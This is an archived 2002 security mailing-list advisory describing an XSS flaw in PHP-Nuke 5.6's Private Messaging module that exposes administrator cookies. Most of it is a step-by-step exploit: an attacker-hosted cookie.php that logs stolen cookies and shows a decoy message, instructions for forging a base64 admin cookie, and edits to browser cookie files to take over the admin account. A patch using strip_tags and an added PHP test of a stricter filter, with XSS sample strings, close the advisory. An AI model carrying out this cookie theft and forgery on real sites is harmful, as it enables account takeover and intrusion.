[UNIX] PHPNuke Private Messaging Module Allows Compromising of Administrator Accounts
From: email@example.com
From: email@example.com To: firstname.lastname@example.org Date: Sun, 18 Aug 2002 14:29:08 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
PHPNuke Private Messaging Module Allows Compromising of Administrator Accounts
A vulnerability in PHPNuke's Private Messaging module allows remote
attackers to steal the hashed cookie (containing the password of the
administrator) thus effectively gaining administrative access to the
* PHP-Nuke version 5.6
Due to an XSS flaw in PHPNuke's Private Messaging module, users can send a
message containing malicious HTML code, which will be executed without any
filtering when the message is opened. The vulnerability has two versions:
in old PHPNuke versions the XSS allowed theft of cookies and effectively of
the password stored in them (since the password was stored without any
protection, i.e. without hashing). In newer versions of PHPNuke (version
5.6 and above), PHPNuke hashes the password with the MD5 algorithm before
encoding it into the cookie. This makes it impossible to recover the clear
text password from the hashed one.
PHPNuke stores cookies in the following form:
Since we can get the MD5-hashed password, all we need to do is run a
script that base64 encodes a string like the one shown before.
Allows any user to get administrative access to a PHP-Nuke site.
For this exploit to work, you must create the following files in your web
cookie.php containing this:
$fp = fopen("cookie.txt","a");
print "Message Not Found!"; /* this is so the admin does not get scared
and thinks it's some bug. */
$admin = base64_encode("decoded_string");
To find out what to replace decoded_string with do the following:
1. Send an appealing private message to admin containing
2. Wait until the administrator checks the message then check cookie.txt
on your server.
3. From the cookie.txt file copy the encrypted text found after admin= and
before the ;
4. Go to http://www.isecurelabs.com/base64.php, paste the copied text and
click decode. It should give you a string of the form:
(Note that the language may be blank).
5. Paste the decoded string into test.php like so:
$admin = base64_encode("paste decoded string here");
6. Login with a normal user to the site.
7. Send private message to yourself containing:
Open the message and a cookie will now be set in your browser, but it will
be associated with your server's URL. So all you need to do is replace your
URL with the site you are testing.
8. In the case of Mozilla, edit cookies.txt in your
~/.mozilla/someprofile/something/ directory. Replace the URL of your
server with the tested site; for other browsers just find the cookie from
your server and edit it so that instead of showing your URL it shows the
URL of the tested site.
9. Restart your browser, and then go back to the tested site. You should
now be an administrator.
Edit reply.php found in /modules/Private_Messages/ and make it strip
dangerous HTML tags from $message. This can be done by going to line 75 in
reply.php and adding this line:
$message = strip_tags($message, '<br><b><u><i>');
This line will remove any HTML tags other than <br>, <b>, <u> and <i>,
preventing any XSS from happening.
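The following is an added example, not code from the advisory or from PHP-Nuke: it wraps the strip_tags() fix above in a function so it can be exercised against constructed messages, and adds a stricter variant, because strip_tags() keeps attributes on the tags it allows, so an event handler attribute on an allowed tag would survive the one-line fix. The function names and sample messages are assumptions of this example.

```php
<?php
// Added example (not from the advisory or PHP-Nuke). Function names are
// hypothetical; reply.php in PHP-Nuke simply assigns $message inline.

// The fix exactly as the advisory gives it: keep only <br>, <b>, <u>, <i>.
function filter_pm_message(string $message): string
{
    return strip_tags($message, '<br><b><u><i>');
}

// Stricter variant: strip_tags() leaves attributes on the allowed tags, so
// <b onmouseover="..."> passes the filter above. After stripping every other
// tag, rewrite each remaining opening tag to its bare form (<b>, <i>, ...).
function filter_pm_message_strict(string $message): string
{
    $stripped = strip_tags($message, '<br><b><u><i>');
    return preg_replace('#<(br|b|u|i)\b[^>]*>#i', '<$1>', $stripped);
}

// Constructed sample messages for testing the filter (not real traffic).
$samples = [
    'plain <b>bold</b> and <i>italic</i> text',
    'hello <script>alert(1)</script>',
    '<img src=x onerror=alert(1)>',
    '<b onmouseover="alert(1)">hover me</b>',
];

foreach ($samples as $s) {
    printf("in:     %s\nloose:  %s\nstrict: %s\n\n",
        $s, filter_pm_message($s), filter_pm_message_strict($s));
}
```

The last sample shows the difference: the loose filter passes the bold tag with its attribute through, while the strict variant reduces it to a bare `<b>`.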
<-delusion-> was not able to contact PHP-Nuke support; furthermore, he
could not find an email address on their site.
The information has been provided by <mailto:email@example.com>
This bulletin is sent to members of the SecuriTeam mailing list.